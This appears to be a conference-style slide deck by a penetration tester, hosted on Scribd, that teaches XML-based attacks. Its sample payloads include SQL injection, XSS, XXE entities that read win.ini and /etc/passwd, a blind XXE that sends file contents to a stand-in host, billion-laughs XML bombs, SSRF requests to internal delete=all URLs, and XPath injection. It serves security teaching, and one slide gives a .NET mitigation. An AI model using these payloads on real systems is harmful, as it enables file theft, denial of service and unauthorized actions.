Scribd
Upload
80 views25 pages

XML Based Attacks: Daniel Tomescu

The document summarizes XML-based attacks, including: - XML injection vulnerabilities similar to SQLi and XSS via modifying XML payloads. - DTD attacks like XML external entity (XXE) and billion laughs DoS via XML bomb definitions. - XML schema attacks including server-side request forgery (SSRF) by defining external schema locations.

Uploaded by

devil
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
80 views25 pages

XML Based Attacks: Daniel Tomescu

The document summarizes XML-based attacks, including: - XML injection vulnerabilities similar to SQLi and XSS via modifying XML payloads. - DTD attacks like XML external entity (XXE) and billion laughs DoS via XML bomb definitions. - XML schema attacks including server-side request forgery (SSRF) by defining external schema locations.

Uploaded by

devil
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 25

XML Based Attacks

Daniel Tomescu

1
About me

Work and education:


 Pentester @ KPMG Romania
 Moderator @ Romanian Security Team
 Student @ Master of Information Management and Security, UPB

Hint: We’re hiring!


My interests:
 Web/mobile application penetration tests
 Internal network penetration tests
 Curious about mobile and embedded devices
 Bug bounty hunter
2
Pentest 101

Input: Our Payload


admin’+or+‘1’=‘1’--+
Process: What we are testing
Login page
Output: (Un)expected result
Authentication bypass

3
Roadmap

1 • XML in a few words

2 • Common vulnerabilities

3 • DTD Attacks

4 • XML Schema Attacks

5 • Xpath Injection

6 • Demo + Q & A
4
XML Usage

• Web apps
- XML-RPC;
- SOAP;
- RSS;

• Documents
- PDFs;
- Office suite;
- eBooks;

• Mobile apps

• Content management

5
XML Family

• Lots of components

• Complex structure

• Many parsing stages

• Parsing errors

• Security vulnerabilities?

6
Common vulnerabilities (1)

SQL Injection

Classic example:
http://target.com/login.php?user=admin&pass=a’+or+’1’=‘1

Equivalent XML Payload:


<?xml version="1.0" encoding="UTF-8"?>
<root>
<user>admin</user>
<pass>a’ or ’1’=‘1</pass>
</root>

7
Common vulnerabilities (2)

Cross-Site Scripting

Classic example:
http://example.com/search.php?query=a‛><script>alert(‚123‛)</script>

Equivalent XML Payload:


<?xml version="1.0" encoding="UTF-8"?>
<root>
<query>a‛%3E%3Cscript%3Ealert(‚123‛)%3C/script%3E</query>
</root>

8
About DTDs

Notes.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note SYSTEM "Notes.dtd">
<note>
<to>Tove</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>Don't forget me this weekend!</body>
</note>

Notes.dtd
<!DOCTYPE note [
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
]>

9
DTDs : XXE Attacks (1)

Request containing an external entity

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE updateProfile [
<!ENTITY file SYSTEM "file:///c:/windows/win.ini"> ]>

<updateProfile>
<firstname>Joe</firstname>
<lastname>&file;</lastname>
</updateProfile>

10
DTDs : XXE Attacks (2)

Blind XXE Attack

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE updateProfile [
<!ENTITY % file SYSTEM "file:///c:/windows/win.ini">
<!ENTITY send SYSTEM 'http://example.com/?%file;'> ]>

<updateProfile>
<firstname>Joe</firstname>
<lastname>&send;</lastname>
</updateProfile>

11
DTDs : Denial of Service (1)

Billion Laughs Attack / XML Bomb

<?xml version="1.0" encoding="utf-8"?>


<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

12
DTDs : Denial of Service (2)

XML Bomb variations

<?xml version="1.0"?> <?xml version="1.0"?>


<!DOCTYPE lolz [ <!DOCTYPE kaboom [
<!ENTITY lol1 "&lol2;"> <!ENTITY a "aaaaaaaaaaaaaaaaaa...">
<!ENTITY lol2 "&lol1;"> ]>
]>
<lolz>&lol1;</lolz> <boom>&a;&a;&a;&a;&a;&a;&a;&a;&a;...</boom>

.NET Code fix for XML Bombs

XmlReaderSettings settings = new XmlReaderSettings();


settings.ProhibitDtd = false;
settings.MaxCharactersFromEntities = 1024;
XmlReader reader = XmlReader.Create(stream, settings);

13
DTDs : SSRF Attacks (1)

Server Side Request Forgery attack example:

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE updateProfile [
<!ENTITY ssrf SYSTEM 'http://10.0.0.2/users.php?delete=all'> ]>

<updateProfile>
<firstname>Joe</firstname>
<lastname>&ssrf;</lastname>
</updateProfile>

14
DTDs : SSRF Attacks (2)

15
XML Schema

Notes.xml
<?xml version="1.0" encoding="UTF-8"?>
<note xmlns="http://www.w3schools.com"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation=‚Notes.xsd"> >
<to>Tove</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>Don't forget me this weekend!</body>
</note>

Notes.xsd
<?xml version="1.0"?>
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
<xs:element name="note">
<xs:complexType>
<xs:sequence>
<xs:element name="to" type="xs:string"/>
<xs:element name="from" type="xs:string"/>
<xs:element name="heading" type="xs:string"/>
<xs:element name="body" type="xs:string"/>
</xs:sequence>
</xs:complexType>
</xs:element>
</xs:schema> 16
XML Schema SSRF

Server Side Request Forgery attack example:

<?xml version="1.0" encoding="utf-8"?>


<roottag xmlns="http://10.0.0.1/users.php?delete=all"
xmlns:secondaryns="http://10.0.0.2/users.php?delete=all"
xmlns:xsi="http://10.0.0.3/users.php?delete=all"
xsi:schemaLocation="http://10.0.0.4/users.php?delete=all">

<secondaryns:s> Hello! </secondaryns:s>

</roottag>

17
XML Schema Poisoning attack

<?xml version="1.0" encoding="utf-8"?>


<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">

<xs:element name="note">
<xs:complexType>
<xs:sequence>
<xs:element name="to" type="xs:string"/>
<xs:element name="from" type="xs:string"/>
<xs:element name="heading" type="xs:string"/>
<xs:element name="body" type="xs:string"/>
</xs:sequence>
</xs:complexType>
</xs:element>

</xs:schema>

18
XML XPath

Notes.xml
<?xml version="1.0" encoding="UTF-8"?>
<bookstore>
<book category="COOKING">
<title lang="it">Everyday Italian</title>
<author>Giada De Laurentiis</author>
<year>2005</year>
<price>30.00</price>
</book>
<book category="CHILDREN">
<title lang="en">Harry Potter</title>
<author>J K. Rowling</author>
<year>2005</year>
<price>19.99</price>
</book>
</bookstore>

XPath expressions
/bookstore/book[1]
/bookstore/book[price>25.00]/title
//title[@lang='en']
/bookstore/book[last()]
19
XPath Injection

employees.xml C#:
<?xml version="1.0" encoding="utf-8"?> String FindUserXPath;
<Employees> FindUserXPath =
<Employee ID="1"> "//Employee[UserName/text()='"
<Name>Mike</Name> + Request("Username")
<UserName>Mike07</UserName> + "' And Password/text()='"
<Password>TopSecret</Password> + Request("Password") + "']";
<Type>Admin</Type>
</Employee>
</Employees>

Payload
Username: Mike07
Password: oops' or 'a'='a

Result - FindUserXPath becomes


//Employee[UserName/text()='Mike07' And Password/text()='oops' or 'a'='a']

20
Content-Type header (1)

HTTP Request: HTTP Request:


POST /update.php HTTP/1.1 POST /update.php HTTP/1.1
Host: target.com Host: target.com
Accept: application/json Accept: application/json
Content-Type: application/json Content-Type: application/xml
Content-Length: 38 Content-Length: 112

{"search":"name","value":‚val"} <?xml version="1.0" encoding="UTF-8" ?>


<root>
<search>name</search>
<value>val</value>
</root>

HTTP Response: HTTP Response:


HTTP/1.1 200 OK HTTP/1.1 200 OK
Content-Type: application/json Content-Type: application/json
Content-Length: 43 Content-Length: 43

{"error": "no results for name val"} {"error": "no results for name val"}

21
Content-Type header (2)

HTTP Request: HTTP Response:


POST /update.php HTTP/1.1 HTTP/1.1 200 OK
Host: target.com Content-Type: application/json
Accept: application/json Content-Length: 2467
Content-Type: application/xml
Content-Length: 228 {"error": "no results for name
root:x:0:0:root:/root:/bin/bash
<?xml version="1.0" encoding="UTF-8" ?> daemon:x:1:1:daemon:/usr/sbin:/bin/sh
<!DOCTYPE xxe [ bin:x:2:2:bin:/bin:/bin/sh
<!ENTITY xxe SYSTEM sys:x:3:3:sys:/dev:/bin/sh
"file:///etc/passwd" > sync:x:4:65534:sync:/bin:/bin/sync....
]>
<root>
<search>name</search>
<value>&xxe;</value>
</root>

22
Cross your fingers!

23
Questions?

24
Thank you!

Contact:
[email protected]
[email protected]

You might also like